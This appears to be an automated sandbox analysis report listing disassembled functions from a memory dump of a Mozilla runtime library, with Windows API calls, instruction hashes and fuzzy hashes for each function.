                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                                                                        • Instruction ID: 7209bfe219e37980f5c496360648875c623d40650a72435ca9e4d91eb2b98cb4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8A1F672A005178FCB14CE68CC907ADB7B6EF95314F1A42B9C949EB785D730E989CB90
                                                                                                                                                                                                                                                                                        Function 6C9B77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9B7A81
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9B7A93
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985C50: GetTickCount64.KERNEL32 ref: 6C985D40
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985C50: EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C985D67
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9B7AA1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985C50: __aulldiv.LIBCMT ref: 6C985DB4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985C50: LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C985DED
                                                                                                                                                                                                                                                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C9B7B31
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4054851604-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8e98d7b456fd5e39b485117d49b3de9adfd02648bf538e5d25a2c7b0b366184a
                                                                                                                                                                                                                                                                                        • Instruction ID: f8be5d61e2a9f030d7f08675d196bc2e66d0c5e35e9f264214a8de5c9a793c4f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e98d7b456fd5e39b485117d49b3de9adfd02648bf538e5d25a2c7b0b366184a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28B1AF356087809BCB14CF24C49065FB7E2BFD9318F254A1CE99677B91DB70E90ACB92
                                                                                                                                                                                                                                                                                        Function 6C9A6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C9A6D45
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9A6E1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4169067295-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 273206f7c8d90829a06144a80fc5343d382ceb3a0be73cf25a91c53055643e4d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2a26b82c877f0ad9090e72f6f06b9436770b29fd3cfd7ab3e3b88798fe456d99
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 273206f7c8d90829a06144a80fc5343d382ceb3a0be73cf25a91c53055643e4d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80A17D746183819FDB14CF28C4807AEFBE6BFA8308F54491DE48A97751DB70E859CB92
                                                                                                                                                                                                                                                                                        Function 6C9CB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6C9CB720
                                                                                                                                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 6C9CB75A
                                                                                                                                                                                                                                                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C99FE3F,00000000,00000000,?,?,00000000,?,6C99FE3F), ref: 6C9CB760
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 304294125-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b3d88ed26074cd1c7ace71d203a8643a5c279f0e5f308ba6e2cdcccf202015fa
                                                                                                                                                                                                                                                                                        • Instruction ID: 5ccbcb7234e88fa190c0227e1180db810b75f157bce09acde5fc46ad17f78c82
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3d88ed26074cd1c7ace71d203a8643a5c279f0e5f308ba6e2cdcccf202015fa
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0C2B0A0420DAEEF019AA1CC85BEF77BD9B28719F105129E911719C0D778E6DCCE62
                                                                                                                                                                                                                                                                                        Function 6C984640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C984777
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-1351931279
                                                                                                                                                                                                                                                                                        • Opcode ID: 81c1fa7a5732645c98f05b394697559ca47b29cbc3234b4f825d5839910a390f
                                                                                                                                                                                                                                                                                        • Instruction ID: 5eeea10bf034b3d52165101627eb5782c1ce013d210ee24af936e5b57450b8ec
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81c1fa7a5732645c98f05b394697559ca47b29cbc3234b4f825d5839910a390f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9B27D71A067018FD708CF19C590715BBE6BFC5328B29CBADE46A8B6E5D771E841CB80
                                                                                                                                                                                                                                                                                        Function 6C9C85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3732870572-0
                                                                                                                                                                                                                                                                                        • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                        • Instruction ID: f12e46c384c623772f879381122d2482cffaa12877b7276e2bba0dd1ac5da4a6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E326B71F0011A8BDF1CCE9CC9A17BEB7B6FB88300F15852AD506BB790DA349D458B96
                                                                                                                                                                                                                                                                                        Function 6C9CB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9703D4,?), ref: 6C9CB955
                                                                                                                                                                                                                                                                                        • NtQueryVirtualMemory.NTDLL ref: 6C9CB9A5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1889792194-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 82101772c390d49ff337f7b04df9e1fd0c4d330ec587c00af3e6140a85ec4989
                                                                                                                                                                                                                                                                                        • Instruction ID: a63463f95096f1481e5ac80add819cacd44e6b423f884e7ef8a666fdd7909bf0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82101772c390d49ff337f7b04df9e1fd0c4d330ec587c00af3e6140a85ec4989
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41B471F01219DFDF04CFA8D881ADEB7B9EF98354F14812AE505A7704DB31E8458B92
                                                                                                                                                                                                                                                                                        Function 6C9A5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcmp.VCRUNTIME140(?,?,6C974A63,?,?), ref: 6C9A5F06
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 91d51bd0b99bf9ee7a06ef3d03d216e203ea299249f994d37043483ed490d7bc
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e5ce33fd76dea0a851c2f47ef242b0e6831ec76c8cb2e8f57f939aec24988a0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91d51bd0b99bf9ee7a06ef3d03d216e203ea299249f994d37043483ed490d7bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4C1D275E01A099BCB04CF99C5906EEBBF6FF8A318F28415DD8556BB45D732A806CB80
                                                                                                                                                                                                                                                                                        Function 6C96DFE0 Relevance: .7, Instructions: 683COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 4142c855acb8172d1abc02ea329f2f545da3fde3ca34d67b0cb44c0176768663
                                                                                                                                                                                                                                                                                        • Instruction ID: ce2c7b58318e0b84884a9d16268ab1ba5e8373e1e8b1ffcea28e1bd6468ad357
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4142c855acb8172d1abc02ea329f2f545da3fde3ca34d67b0cb44c0176768663
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D342A172A087518BD304CE3DC89175AB3E2BFC9364F198B2DE999A7BD0D734D9418B81
                                                                                                                                                                                                                                                                                        Function 6C9D76E3 Relevance: .5, Instructions: 540COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ebc6e4fdf23630dc24123358578e6835c461ca9a55e0968987620edce2fe440
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6332FA71E0061A8FCB14CF98C890AADF7B6FF88308F5585A9C549B7749D731A986CF90
                                                                                                                                                                                                                                                                                        Function 6C9D6E63 Relevance: .5, Instructions: 498COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                                                                                                                                                        • Instruction ID: 129051dfbdf47109d22125346549a7b71f077f2eb3b97d5bd55c818db7750ebe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F22D771E006198FCB14CF98C980AADF7B6FF88304F6585AAC949B7745D731A986CF90
                                                                                                                                                                                                                                                                                        Function 6C990512 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                        • Instruction ID: 3ad7e1e44205c6cbb74dce5697b1d3f2934bd4840bbf42ccf8143b5a0931f8f6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81221771E00619CFDB24CF98C890AADF7B6FF89304F588599C45AA7705D731A986CF80
                                                                                                                                                                                                                                                                                        Function 6C9DAC00 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 104a1d4f600792dbecf740e3db9629e6f858578d94632c2e5315b444448896ab
                                                                                                                                                                                                                                                                                        • Instruction ID: f647ee1b894d18281f36c2218e6d869d07e5fdf261373496c6fe6523c80de9b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 104a1d4f600792dbecf740e3db9629e6f858578d94632c2e5315b444448896ab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13F15A71608B458FD700CE28C8803AAB7E6AFD5318F16CA2DE4D4A7781EB74F955C792
                                                                                                                                                                                                                                                                                        Function 6C96C670 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                                                                                                                                                        • Instruction ID: 0f87789f549e13f194901cf071e96575f9c6e4bb450b7fed63516011928a5396
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31A19371F0061A8BEF08CE69C8913AEB7F2AFC9354F198169E915E7785D7349C068BD0
                                                                                                                                                                                                                                                                                        Function 6C9A7710 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
